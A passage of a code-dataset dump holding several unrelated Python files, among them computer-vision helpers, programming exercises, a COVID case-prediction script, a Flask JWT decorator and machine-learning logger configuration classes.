hsv[..., 2] ** (1 / gamma)\r\n hsv = np.uint8(hsv)\r\n img_flow = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)\r\n return mag, ang / np.pi * 180, img_flow\r\n\r\n\r\nclass Optical_flow:\r\n def __init__(self):\r\n self.initialized = 0\r\n self.image_now = None\r\n self.image_last = None\r\n\r\n def input(self, image):\r\n self.image_now = image\r\n\r\n def imshow(self):\r\n plt.figure()\r\n plt.subplot(2, 1, 1)\r\n plt.imshow(self.image_last)\r\n plt.subplot(2, 1, 2)\r\n plt.imshow(self.image_now)\r\n\r\n def run(self):\r\n if self.initialized == 0:\r\n if self.image_now is not None:\r\n self.initialized = 1\r\n self.image_last = self.image_now\r\n return None, None, None\r\n\r\n mag, dir, img_flow = opt_flow2(self.image_now, self.image_last)\r\n self.image_last = self.image_now\r\n return mag, dir, img_flow\r\n\r\ndef depth_flow(image_1, image_2, dt):\r\n flow = (image_2 - image_1) / dt\r\n return flow\r\n\r\n\r\ndef coord_trans(depth_image, Lidar_info, Camera_info1): # data fusion (transform LiDAR coord to camera coord, then to image coord)\r\n\r\n upper_lim = Lidar_info['upper_lim']\r\n focus = Camera_info1['focus']\r\n h_sample = Camera_info1['h_sample']\r\n v_sample = Camera_info1['v_sample']\r\n y_sample = Lidar_info['y_sample']\r\n x_sample = Lidar_info['x_sample']\r\n x_sample_deg = Lidar_info['x_sample_deg']\r\n y_sample_deg = Lidar_info['y_sample_deg']\r\n\r\n row_lidar, col_lidar = (np.indices((y_sample, x_sample))).astype('float32')\r\n theta, phi = find_lidar_theta_phi_from_coord_Ma(row_lidar, col_lidar, x_sample, x_sample_deg, y_sample_deg, upper_lim)\r\n\r\n camera_coord_x, camera_coord_y, camera_coord_z = polar_to_cartesian(depth_image, theta, phi)\r\n\r\n reference_x =(h_sample-1) / 2 - camera_coord_x * focus / camera_coord_z\r\n reference_y = (v_sample-1) / 2 - camera_coord_y * focus / camera_coord_z\r\n\r\n return reference_x, reference_y\r\n\r\n\r\ndef edge_detect1(image): # both side, outer edge\r\n # image = np.uint8(image)\r\n kernel = [1, -1]\r\n height = image.shape[0]\r\n width = image.shape[1]\r\n\r\n # vertical filter\r\n v_filtered_image_1 = np.empty_like(image)\r\n for h in range(height):\r\n if h + 1 < height:\r\n for w in range(width):\r\n v_filtered_image_1[h, w] = image[h, w] * kernel[0] + image[h + 1, w] * kernel[1]\r\n if v_filtered_image_1[h, w] < 0:\r\n v_filtered_image_1[h, w] = 0\r\n\r\n else:\r\n for w in range(width):\r\n v_filtered_image_1[h, w] = image[h, w] * kernel[0] + image[h, w] * kernel[1]\r\n if v_filtered_image_1[h, w] < 0:\r\n v_filtered_image_1[h, w] = 0\r\n\r\n v_filtered_image_2 = np.empty_like(image)\r\n for h in range(height):\r\n if h > 0:\r\n for w in range(width):\r\n v_filtered_image_2[h, w] = image[h, w] * kernel[0] + image[h - 1, w] * kernel[1]\r\n if v_filtered_image_2[h, w] < 0:\r\n v_filtered_image_2[h, w] = 0\r\n\r\n else:\r\n for w in range(width):\r\n v_filtered_image_2[h, w] = image[h, w] * kernel[0] + image[h, w] * kernel[1]\r\n if v_filtered_image_2[h, w] < 0:\r\n v_filtered_image_2[h, w] = 0\r\n\r\n v_filtered_image = v_filtered_image_2 + v_filtered_image_1\r\n\r\n # horizontal filter\r\n h_filtered_image_1 = np.empty_like(image)\r\n for w in range(width):\r\n if w + 1 < width:\r\n for h in range(height):\r\n h_filtered_image_1[h, w] = image[h, w] * kernel[0] + image[h, w + 1] * kernel[1]\r\n if h_filtered_image_1[h, w] < 0:\r\n h_filtered_image_1[h, w] = 0\r\n else:\r\n for h in range(height):\r\n h_filtered_image_1[h, w] = image[h, w] * kernel[0] + image[h, w] * kernel[1]\r\n if h_filtered_image_1[h, w] < 0:\r\n h_filtered_image_1[h, w] = 0\r\n\r\n h_filtered_image_2 = np.empty_like(image)\r\n for w in range(width):\r\n if w > 0:\r\n for h in range(height):\r\n h_filtered_image_2[h, w] = image[h, w] * kernel[0] + image[h, w - 1] * kernel[1]\r\n if h_filtered_image_2[h, w] < 0:\r\n h_filtered_image_2[h, w] = 0\r\n else:\r\n for h in range(height):\r\n h_filtered_image_2[h, w] = image[h, w] * kernel[0] + image[h, w] * kernel[1]\r\n if h_filtered_image_2[h, w] < 0:\r\n h_filtered_image_2[h, w] = 0\r\n\r\n h_filtered_image = h_filtered_image_1 + h_filtered_image_2\r\n\r\n return v_filtered_image, h_filtered_image\r\n\r\ndef edge_detect2(image, threshhold): # color filled\r\n kernel = [-1, 1]\r\n height = image.shape[0]\r\n width = image.shape[1]\r\n\r\n # vertical filter\r\n v_filtered_image = np.empty_like(image)\r\n for h in range(height):\r\n if h + 1 < height:\r\n for w in range(width):\r\n v_filtered_image[h, w] = image[h, w] * kernel[0] + image[h + 1, w] * kernel[1]\r\n\r\n else:\r\n for w in range(width):\r\n v_filtered_image[h, w] = image[h, w] * kernel[0] + image[h, w] * kernel[1]\r\n\r\n # horizontal filter\r\n h_filtered_image = np.empty_like(image)\r\n for w in range(width):\r\n if w + 1 < width:\r\n for h in range(height):\r\n h_filtered_image[h, w] = image[h, w] * kernel[0] + image[h, w + 1] * kernel[1]\r\n else:\r\n for h in range(height):\r\n h_filtered_image[h, w] = image[h, w] * kernel[0] + image[h, w] * kernel[1]\r\n\r\n h_filtered_image2 = np.empty_like(image)\r\n #threshhold = 20\r\n for h in range(height):\r\n value = 0\r\n h_filtered_image2[h, 0] = value\r\n for w in range(width - 1):\r\n if h_filtered_image[h, w] > threshhold:\r\n value += h_filtered_image[h, w]\r\n h_filtered_image2[h, w + 1] = value\r\n elif h_filtered_image[h, w] < -threshhold:\r\n value += h_filtered_image[h, w]\r\n h_filtered_image2[h, w + 1] = value\r\n else:\r\n h_filtered_image2[h, w + 1] = value\r\n\r\n return h_filtered_image, h_filtered_image2\r\n\r\ndef edge_detect3(lidar_img):\r\n #lidar_img = lidar_img / np.max(lidar_img) * 255\r\n edge_y = cv2.Sobel(lidar_img, cv2.CV_64F, 0, 2, ksize=1)\r\n edge_x = cv2.Sobel(lidar_img, cv2.CV_64F, 2, 0, ksize=1)\r\n #edge = np.append(np.expand_dims(edge_y, axis=2), np.expand_dims(edge_x, axis=2), axis=2)\r\n #edge = np.max(edge, axis=2)\r\n return edge_y, edge_x\r\n\r\n\r\n","repo_name":"Dongpeng-Ding/GTAV-Autonomy-","sub_path":"image_preprocess.py","file_name":"image_preprocess.py","file_ext":"py","file_size_in_byte":13763,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"14755006463","text":"'''\n[문제]\n 0에서 100사이의 랜덤 숫자를 시험 점수로 저장한다.\n 시험점수에 해당하는 학점을 출력하시오.\n 아래는 점수표이다.\n 100~91 이면 A학점,\n 90~81 이면 B학점,\n 80이하는 \"재시험\"\n \n 단, 만점이거나, A학점과 B학점의 일의 자리가 8점이상이면 + 기호를 추가하시오.\n [예] \n 100 => A+\n 88 ==> B+\n 82 ==> B\n 23 ==> 재시험\n'''\n'''\n 랜덤을 테스트할 때는 원하는 값이 나올 때까지 무한반복을 하게된다.\n 아래와 같이 일정 숫자가 나오도록 폭을 조정하면 테스트하기 쉽다. \n'''\n\n# 100(A+) / 98(A+) / 91(A) / 88(B+) / 82(B) / 51(재시험)\n\nimport random\nscore = random.randint(0,100)\nscore = 91\nprint(score)\n\n일 = score % 10\n\nresult = ''\nif score >= 91 :\n result = 'A'\n if 일 >= 8 or score == 100 :\n result += '+'\nelif score >= 81 :\n result = 'B'\n if 일 >= 8 :\n result += '+'\nelse :\n result = '재시험'\n \nprint(result)","repo_name":"jomira0220/study","sub_path":"jomira/00_문법총정리/Python_문제풀기/조건문/조건문4_개념01_중첩조건_학점.py","file_name":"조건문4_개념01_중첩조건_학점.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19628753779","text":"from typing import List, Optional\n\nfrom common.nats import publish\n\n\nasync def broadcast(service: str, event: str, **kwargs):\n \"\"\"\n Broadcast an automated event to all the task handlers\n :param service: the service that owns the event\n :param event: the event to trigger\n :param kwargs: any parameters to pass to the handlers\n \"\"\"\n await publish(f\"{service}.automated.{event}\", kwargs)\n\n\nclass TasksProxy(object):\n def __init__(self, previous: Optional[List[str]] = None):\n self.__previous = previous or []\n\n def __getattr__(self, item: str) -> \"TasksProxy\":\n if len(self.__previous) >= 2:\n raise AttributeError(f\"'tasks' object has no attribute {item!r}\")\n\n return TasksProxy(self.__previous + [item])\n\n async def __call__(self, **kwargs):\n assert len(self.__previous) == 2\n\n await publish(f\"{self.__previous[0]}.manual.{self.__previous[1]}\", kwargs)\n\n\n# Used for \"magically\" calling a task\ntasks = TasksProxy()\n","repo_name":"WaffleHacks/application-portal","sub_path":"common/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"5829443786","text":"#\n# @lc app=leetcode.cn id=206 lang=python3\n#\n# [206] 反转链表\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def reverseList(self, head: ListNode) -> ListNode:\n if not head or head.next == None: # 如果空链表或者只有1个,直接返回head即可\n return head\n # 此时链表长度 >= 2\n\n # 时间复杂度n,空间复杂度1\n # preNode = None\n # curNode = head\n # nextNode = head.next\n # # preNode.next = None # 把反转后末节点next置None\n # while curNode: # 下个节点非空,就继续反转\n # curNode.next = preNode\n # preNode = curNode\n # curNode = nextNode\n # if nextNode: # 如果nextNode为None,那么它没有next属性;下次遍历将curNode设为None后会结束循环 \n # nextNode = nextNode.next\n # return preNode\n\n # 将原链表逐个放到新链表,时间复杂度和空间复杂度均n,\n new = None\n while head:\n tmp = head\n head = head.next\n tmp.next = new\n new = tmp\n return new\n # head, head.next, new = head.next, new, head\n\n\n \n# @lc code=end\n\n","repo_name":"freemanwang/AlgorithmJS","sub_path":"206.反转链表.py","file_name":"206.反转链表.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39566665255","text":"import numpy as np\nimport pandas as pd\nimport csv\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.linear_model import LinearRegression\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndataset = pd.read_csv('https://api.covid19india.org/csv/latest/case_time_series.csv')\ndataset=dataset.dropna()\n# del dataset['Date']\n# del dataset['Month']\n\ndef listtostr(s): \n res = str(s)[1:-1] \n return (float(res))\n\ndef india_pred(i):\n \n X=[]\n y=[]\n y = dataset.iloc[:, i].values\n for n in range(1,len(y)+1):\n X.append([n])\n\n poly_reg = PolynomialFeatures(degree = 4)\n X_poly = poly_reg.fit_transform(X)\n poly_reg.fit(X_poly, y)\n lin_reg_2 = LinearRegression()\n lin_reg_2.fit(X_poly, y)\n growth_rate = np.exp(np.diff(np.log(y))) - 1\n str(list(growth_rate).pop()*100)+'%'\n growth_rate=str(\"{:.1f}\".format(list(growth_rate).pop()*100))+' %'\n prediction=lin_reg_2.predict(poly_reg.fit_transform([[len(y)+1]]))\n \n# plt.scatter(X, y, color = 'red')\n# predline=[]\n# for n in range(0,130):\n# predline.append([n])\n# #predline = predline[40:] \n# plt.plot(predline, lin_reg_2.predict(poly_reg.fit_transform(predline)), color = 'blue')\n\n# plt.title(dataset.columns[i])\n# plt.xlabel('Days')\n# plt.ylabel('Cases')\n# plt.show()\n\n return prediction,growth_rate\n \n \n \n# dataset = dataset[:-1]\nprediction=[]\ngrowth_rate=[]\ncurrent=[]\n \ndef pred_list():\n cols=[2,4,6]\n \n for i in cols:\n pred,grow =india_pred(i)\n prediction.append(listtostr(pred))\n growth_rate.append(grow) \n \n #print(prediction)\n #print(\"Next day prediction for India: \\n Cases: \"+\"{:.2f}\".format(prediction[0])+\" Recovered: \"+\"{:.2f}\".format(prediction[1])+\"Deaths: \"+\"{:.2f}\".format(prediction[2])+\" Case growth rate: \"+growth_rate[0])\n \n predicted_cases=prediction[0]\n predicted_recover=prediction[1]\n predicted_deaths=prediction[2]\n growth=growth_rate[0]\n \n return predicted_cases, predicted_deaths, predicted_recover,growth\n \n \npred_list()","repo_name":"aniketkamble30/covid_Yodha","sub_path":"india_pred.py","file_name":"india_pred.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"39858713172","text":"def add_elements(o_num):\n\n l = [] # list with elements\n\n for i in range(1, o_num+1): # user enters each element\n el = int(input(f\"Enter element number {i}: \"))\n l.append(el)\n\n return l\n\n\ndef t(q, capacity):\n\n el = []\n\n p_faults = 0 # number of Page Faults\n no_p_faults = 0 \n\n for i in range(len(q)):\n \n c = 0 # counter to check if value in list\n\n for e in el:\n if e == q[i]:\n c = 1\n break\n else:\n c = 0\n \n if c == 0:\n \n if i < capacity:\n el.append(q[i])\n else:\n el.remove(el[0]) # changing first el (the one that was entered first) to a new value\n el.append(q[i])\n p_faults += 1\n\n else:\n no_p_faults += 1\n\n result = [el, p_faults, no_p_faults] # gathering all values\n\n return result\n\n\ndef main():\n\n o_num = int(input(\"Enter number of elements: \"))\n print()\n\n queue = add_elements(o_num) # adding elements to a queue\n print()\n\n capacity = int(input(\"Enter capacity: \")) # length of the list\n print()\n\n result = t(queue, capacity)\n\n print(\"List: \", result[0], \"; Page Faults: \", result[1], \"; no Page Faults: \", result[2])\n\n\nmain()\n","repo_name":"YanaBalyoshenko/PythonWorks","sub_path":"FIFO.py","file_name":"FIFO.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17514647877","text":"import unittest\nimport os\nimport re\nfrom TSPU import TSPU\n\n\ndef atoi(text):\n return int(text) if text.isdigit() else text\n\n\ndef natural_keys(text):\n \"\"\"\n :param text:\n list.sort(key=natural_keys) sorts in human order\n http://nedbatchelder.com/blog/200712/human_sorting.html\n (See Toothy's implementation in the comments)\n \"\"\"\n return [atoi(c) for c in re.split('(\\d+)', text)]\n\n\nclass TSPUTest(unittest.TestCase):\n def testFun(self):\n for file in sorted(os.listdir(\"..//in\"), key=natural_keys):\n if file.endswith(\".txt\"):\n arquivo_saida_esperada = open('..//out//{name}'.format(name=file), 'r')\n tspu = TSPU()\n tspu.gerar_matriz('..//in//{name}'.format(name=file))\n tspu.gerar_caminho_minimo()\n caminho_esperado = arquivo_saida_esperada.read().strip()\n self.assertEqual(\n tspu.output_caminho_minimo(),\n caminho_esperado,\n '\\nArquivo: {nome_arquivo}'\n '\\nSaida: \\n{saida}'\n '\\nEsperado: \\n{esperado}'.format(\n nome_arquivo=file,\n saida=tspu.output_caminho_minimo(),\n esperado=caminho_esperado\n )\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"EduardoShibukawa/UEM","sub_path":"PAA/UVA - 116 - Unidirectional TS/Tests/TSPUTest.py","file_name":"TSPUTest.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37203702066","text":"def uklanjanje_razmaka(s):\n \"\"\"\n U datom stringu sve uzastopne blankove (ako ih ima više od jednog) zamijeniti jednim\n blankom. \n \"\"\"\n k = []\n s = s.split(\" \")\n for i in s:\n if i != '':\n k.append(i)\n return ' '.join(k)\n\nprint('sa uklonjenim razmacima je:',uklanjanje_razmaka(input(\"unesite recenicu iz koje trebaju da se uklone suvisni razmaci: \"))) ","repo_name":"mdrazen27/algoritmi_domaci2","sub_path":"uklanjanje_razmaka.py","file_name":"uklanjanje_razmaka.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15808507238","text":"from functools import wraps\nfrom flask_jwt_extended import JWTManager, verify_jwt_in_request, get_jwt_claims\nfrom flask_restful import abort\n\nfrom Models.Users.UserModel import UserModel\n\njwt = JWTManager()\n\ndef admin_required(fn):\n @wraps(fn)\n def wrapper(*args, **kwargs):\n verify_jwt_in_request()\n claims = get_jwt_claims()\n if claims['account_type'] != 'admin' or claims['account_type'] is None:\n abort(403)\n else:\n return fn(*args, **kwargs)\n return wrapper\n\n@jwt.user_claims_loader\ndef add_claims_to_access_token(identity):\n user = UserModel.get_user(login = identity)\n if user is None:\n return {'account_type' : None}\n if user.account_type == 'admin':\n return {'account_type' : 'admin'}\n else:\n return {'account_type' : 'user'}","repo_name":"cezary-kania/UploadIO-api","sub_path":"src/Utils/JWT.py","file_name":"JWT.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13526292415","text":"'''\n This code is to predict the original character from a perturbed character \n'''\nimport numpy as np\nimport pandas as pd\nfrom pandas.io.parsers import read_csv \n\ntrain_dict={}\ntest_dict={}\nsimilarity_dict={}\nerror_dict={}\ntest_file='noisy_test.csv'\ndef full_data():\n train_data=pd.read_csv('train.csv')\n for i in range(1,27):\n arr=[]\n for j in range(1,36):\n arr.append(train_data['x{}'.format(j)][i-1])\n train_dict[i]=arr\n \n # Testing Data\n test_data=pd.read_csv(test_file)\n test_length=len(test_data['x1'])\n for i in range(test_length):\n arr=[]\n for j in range(1,36):\n arr.append(test_data['x{}'.format(j)][i])\n test_dict['{}{}'.format(test_data['Label'][i],i)]=arr\n \n\n\n\n\ndef read_data():\n train_data=pd.read_csv('train.csv')\n for i in range(1,27):\n arr=[]\n for j in range(1,36):\n arr.append(train_data['x{}'.format(j)][i-1])\n train_dict[i]=arr\n \n test_data=pd.read_csv(test_file)\n for i in range(1,8):\n arr=[]\n for j in range(1,36):\n arr.append(test_data['x{}'.format(j)][i-1])\n test_dict[i]=arr \n\n\ndef cosine_similarity(vecA,vecB):\n # vecA, vecB are here 35 dimension vector\n sum_sqrdA=0\n sum_sqrdB=0\n cosine_value=0\n for i in range(len(vecA)):\n sum_sqrdA+=vecA[i]**2\n sum_sqrdB+=vecB[i]**2\n cosine_value+=vecA[i]*vecB[i]\n cosine_value=cosine_value/(np.sqrt(sum_sqrdA)*np.sqrt(sum_sqrdB))\n return cosine_value\n\ndef print_similarity_dict():\n file=open('similarity.txt','w')\n for key,value in similarity_dict.items():\n file.write(\"{}:{}\\n\".format(key,value))\n file.close \n print(\"Similarity dictioanry successfuly printed!!\")\n \n # print(error_dict)\n file1=open('error.txt','w')\n for key,value in error_dict.items():\n file1.write(\"{}:{}\\n\".format(key,value))\n file1.close \n print(\"Error dictioanry successfuly printed!!\")\n \n\ndef analyze():\n total_count=0\n true_count=0\n for key,value in similarity_dict.items():\n total_count+=1\n if key[0]==value:\n true_count+=1\n else:\n error_dict[key]=value\n print(\"Correct prob.:{}({}/{}), Wrong Prob.:{}({}/{})\".format(true_count/total_count,true_count,total_count,1-true_count/total_count,total_count-true_count,total_count))\n\ndef check_similarity():\n # read_data()\n full_data()\n character=['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\n for ts_key,ts_value in test_dict.items():\n similarity=0\n similar_with=0\n for tr_key,tr_value in train_dict.items():\n sim=cosine_similarity(ts_value,tr_value)\n if sim>similarity:\n similar_with=tr_key\n similarity=sim\n similarity_dict[ts_key]=character[similar_with-1]\n # print(similarity_dict)\n analyze()# Make sure to call analyze function before calling print_similarity_dict(), otherwise no error_dict will print\n print_similarity_dict()\n \n\ncheck_similarity()\n# full_data()","repo_name":"khritish17/Neuromorphic-Hardware-Design","sub_path":"Computational Work/CR Python codes/Comparision codes/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72638591528","text":"from __future__ import annotations\n\nfrom abc import ABC, abstractmethod\nfrom dataclasses import asdict, dataclass\nfrom typing import Any, Dict, List, Optional\n\nimport yahp as hp\n\nfrom composer.loggers.file_logger import FileLogger\nfrom composer.loggers.in_memory_logger import InMemoryLogger\nfrom composer.loggers.logger import LogLevel\nfrom composer.loggers.logger_destination import LoggerDestination\nfrom composer.loggers.object_store_logger import ObjectStoreLogger\nfrom composer.loggers.progress_bar_logger import ProgressBarLogger\nfrom composer.loggers.wandb_logger import WandBLogger\nfrom composer.utils import ObjectStoreHparams, import_object\n\n__all__ = [\n \"FileLoggerHparams\",\n \"InMemoryLoggerHparams\",\n \"LoggerDestinationHparams\",\n \"ProgressBarLoggerHparams\",\n \"WandBLoggerHparams\",\n \"ObjectStoreLoggerHparams\",\n \"logger_registry\",\n]\n\n\n@dataclass\nclass LoggerDestinationHparams(hp.Hparams, ABC):\n \"\"\"Base class for logger callback hyperparameters.\n\n Logger parameters that are added to :class:`~.trainer_hparams.TrainerHparams` (e.g. via YAML or the CLI) are\n initialized in the training loop.\n \"\"\"\n\n @abstractmethod\n def initialize_object(self) -> LoggerDestination:\n \"\"\"Initializes the logger.\"\"\"\n pass\n\n\n@dataclass\nclass FileLoggerHparams(LoggerDestinationHparams):\n \"\"\":class:`~composer.loggers.file_logger.FileLogger`\n hyperparameters.\n\n See :class:`~composer.loggers.file_logger.FileLogger` for documentation.\n\n Args:\n filename (str, optional): See :class:`~composer.loggers.file_logger.FileLogger`.\n artifact_name (str, optional): See :class:`~composer.loggers.file_logger.FileLogger`.\n capture_stdout (bool, optional): See :class:`~composer.loggers.file_logger.FileLogger`.\n capture_stderr (bool, optional): See :class:`~composer.loggers.file_logger.FileLogger`.\n buffer_size (int, optional): See\n :class:`~composer.loggers.file_logger.FileLogger`.\n log_level (LogLevel, optional): See\n :class:`~composer.loggers.file_logger.FileLogger`.\n log_interval (int, optional): See\n :class:`~composer.loggers.file_logger.FileLogger`.\n flush_interval (int, optional): See\n :class:`~composer.loggers.file_logger.FileLogger`.\n \"\"\"\n log_level: LogLevel = hp.optional(\"The maximum verbosity to log. Default: EPOCH\", default=LogLevel.EPOCH)\n filename: str = hp.optional(\"Filename format string for the logfile.\", default='{run_name}/logs-rank{rank}.txt')\n artifact_name: Optional[str] = hp.optional(\"Artifact name format string for the logfile.\", default=None)\n capture_stdout: bool = hp.optional(\"Whether to capture writes to `stdout`\", default=True)\n capture_stderr: bool = hp.optional(\"Whether to capture writes to `stderr`\", default=True)\n buffer_size: int = hp.optional(\"Number of bytes to buffer. Defaults to 1 for line-buffering. \"\n \"See https://docs.python.org/3/library/functions.html#open\",\n default=1) # line buffering. Python's default is -1.\n flush_interval: int = hp.optional(\n \"Frequency to flush the file, relative to the ``log_level``. \"\n \"Defaults to 100 of the unit of ``log_level``.\",\n default=100)\n log_interval: int = hp.optional(\n \"Frequency to record log messages, relative to the ``log_level``.\"\n \"Defaults to 1 (record all messages).\",\n default=1)\n\n def initialize_object(self) -> FileLogger:\n return FileLogger(**asdict(self))\n\n\n@dataclass\nclass WandBLoggerHparams(LoggerDestinationHparams):\n \"\"\":class:`~composer.loggers.wandb_logger.WandBLogger` hyperparameters.\n\n Args:\n project (str, optional): WandB project name.\n group (str, optional): WandB group name.\n name (str, optional): WandB run name.\n If not specified, the :attr:`.Logger.run_name` will be used.\n entity (str, optional): WandB entity name.\n tags (str, optional): WandB tags, comma-separated.\n config (Dict[str, Any], optional): WandB run configuration.\n flatten_config (bool, optional): Whether to flatten the run config. (default: ``False``)\n log_artifacts (bool, optional): See :class:`~composer.loggers.wandb_logger.WandBLogger`.\n rank_zero_only (bool, optional): See :class:`~composer.loggers.wandb_logger.WandBLogger`.\n extra_init_params (dict, optional): See\n :class:`~composer.loggers.wandb_logger.WandBLogger`.\n \"\"\"\n\n project: Optional[str] = hp.optional(doc=\"wandb project name\", default=None)\n group: Optional[str] = hp.optional(doc=\"wandb group name\", default=None)\n name: Optional[str] = hp.optional(doc=\"wandb run name\", default=None)\n entity: Optional[str] = hp.optional(doc=\"wandb entity\", default=None)\n tags: Optional[str] = hp.optional(doc=\"wandb tags comma separated\", default=None)\n log_artifacts: bool = hp.optional(doc=\"Whether to log artifacts\", default=False)\n rank_zero_only: bool = hp.optional(\"Whether to log on rank zero only\", default=True)\n extra_init_params: Dict[str, Any] = hp.optional(doc=\"wandb parameters\", default_factory=dict)\n config: Dict[str, Any] = hp.optional(doc=\"Wandb run configuration\", default_factory=dict)\n flatten_config: bool = hp.optional(\n doc=\"Whether to flatten the config, which can make nested fields easier to visualize and query.\", default=False)\n\n def initialize_object(self) -> WandBLogger:\n tags = None\n if self.tags is not None:\n tags = list(set([x.strip() for x in self.tags.split(\",\") if x.strip() != \"\"]))\n\n config_dict = self.config\n\n if \"config\" in self.extra_init_params:\n config_dict = self.extra_init_params[\"config\"]\n\n if self.flatten_config:\n config_dict = self._flatten_dict(config_dict, prefix=[])\n\n init_params = {\n \"project\": self.project,\n \"name\": self.name,\n \"group\": self.group,\n \"entity\": self.entity,\n \"tags\": tags,\n \"config\": config_dict,\n }\n init_params.update(self.extra_init_params)\n return WandBLogger(\n log_artifacts=self.log_artifacts,\n rank_zero_only=self.rank_zero_only,\n init_params=init_params,\n )\n\n @classmethod\n def _flatten_dict(cls, data: Dict[str, Any], prefix: List[str]) -> Dict[str, Any]:\n \"\"\"Flattens a dictionary with list or sub dicts to have dot syntax.\n\n .. testcode::\n\n >>> config = {\n ... \"sub_dict\":{\n ... \"sub_list\":[\n ... \"sub_sub_dict\":{\n ... \"foo\": 0,\n ... \"bar\": \"baz\"\n ... }\n ... ]\n ... },\n ... \"hello\": \"world\"\n ... }\n >>> _flatten_dict(config)\n {\n 'sub_dict.sub_list.sub_sub_dict.foo': 0,\n 'sub_dict.sub_list.sub_sub_dict.bar': 'baz',\n 'hello': 'world',\n }\n \"\"\"\n all_items = {}\n for key, val in data.items():\n key_items = list(prefix) + [key]\n key_name = \".\".join(key_items)\n if isinstance(val, dict):\n all_items.update(cls._flatten_dict(val, key_items))\n elif isinstance(val, list):\n found_sub_dicts = False\n for item in val:\n if isinstance(item, dict):\n found_sub_dicts = True\n for sub_key, sub_val in item.items():\n if isinstance(sub_val, dict):\n all_items.update(cls._flatten_dict(sub_val, key_items + [sub_key]))\n else:\n all_items.update({sub_key: sub_val})\n if not found_sub_dicts:\n all_items[key_name] = val\n else:\n all_items[key_name] = val\n return all_items\n\n\n@dataclass\nclass ProgressBarLoggerHparams(LoggerDestinationHparams):\n \"\"\":class:`~composer.loggers.progress_bar_logger.ProgressBarLogger`\n hyperparameters.\n\n .. deprecated:: 0.6.0\n\n This class is deprecated. Instead, please specify the :class:`.ProgressBarLogger` arguments\n directly in the :class:`~composer.trainer.trainer_hparams.TrainerHparams`. This class will be removed\n in v0.7.0.\n\n Args:\n progress_bar (bool, optional): See :class:`.ProgressBarLogger`.\n log_to_console (bool, optional): See :class:`.ProgressBarLogger`.\n console_log_level (bool, optional): See :class:`.ProgressBarLogger`.\n stream (bool, optional): See :class:`.ProgressBarLogger`.\n \"\"\"\n\n progress_bar: bool = hp.optional(\"Whether to show a progress bar.\", default=True)\n log_to_console: Optional[bool] = hp.optional(\"Whether to print log statements to the console.\", default=None)\n console_log_level: LogLevel = hp.optional(\"The maximum log level.\", default=LogLevel.EPOCH)\n stream: str = hp.optional(\"The stream at which to write the progress bar and log statements.\", default=\"stderr\")\n\n def initialize_object(self) -> ProgressBarLogger:\n return ProgressBarLogger(\n progress_bar=self.progress_bar,\n log_to_console=self.log_to_console,\n console_log_level=self.console_log_level,\n stream=self.stream,\n )\n\n\n@dataclass\nclass InMemoryLoggerHparams(LoggerDestinationHparams):\n \"\"\":class:`~composer.loggers.in_memory_logger.InMemoryLogger`\n hyperparameters.\n\n Args:\n log_level (str | LogLevel, optional):\n See :class:`~composer.loggers.in_memory_logger.InMemoryLogger`.\n \"\"\"\n log_level: LogLevel = hp.optional(\"The maximum verbosity to log. Default: BATCH\", default=LogLevel.BATCH)\n\n def initialize_object(self) -> LoggerDestination:\n return InMemoryLogger(log_level=self.log_level)\n\n\n@dataclass\nclass ObjectStoreLoggerHparams(LoggerDestinationHparams):\n \"\"\":class:`~composer.loggers.in_memory_logger.InMemoryLogger`\n hyperparameters.\n\n Args:\n object_store_hparams (ObjectStoreHparams): The object store provider hparams.\n should_log_artifact (str, optional): The path to a filter function which returns whether an artifact should be\n logged. The path should be of the format ``path.to.module:filter_function_name``.\n\n The function should take (:class:`~composer.core.state.State`, :class:`.LogLevel`, ````).\n The artifact name will be a string. The function should return a boolean indicating whether the artifact\n should be logged.\n\n .. seealso: :func:`composer.utils.import_helpers.import_object`\n\n Setting this parameter to ``None`` (the default) will log all artifacts.\n object_name (str, optional): See :class:`~composer.loggers.object_store_logger.ObjectStoreLogger`.\n config_artifact_name (str, optional): See :class:`~composer.loggers.object_store_logger.ObjectStoreLogger`.\n num_concurrent_uploads (int, optional): See :class:`~composer.loggers.object_store_logger.ObjectStoreLogger`.\n upload_staging_folder (str, optional): See :class:`~composer.loggers.object_store_logger.ObjectStoreLogger`.\n use_procs (bool, optional): See :class:`~composer.loggers.object_store_logger.ObjectStoreLogger`.\n \"\"\"\n object_store_hparams: ObjectStoreHparams = hp.required(\"Object store provider hparams.\")\n should_log_artifact: Optional[str] = hp.optional(\n \"Path to a filter function which returns whether an artifact should be logged.\", default=None)\n object_name: str = hp.optional(\"A format string for object names\", default=\"{artifact_name}\")\n config_artifact_name: Optional[str] = hp.optional(\n \"Format string to describe how to store the training configuration.\", default=\"{run_name}/config.yaml\")\n 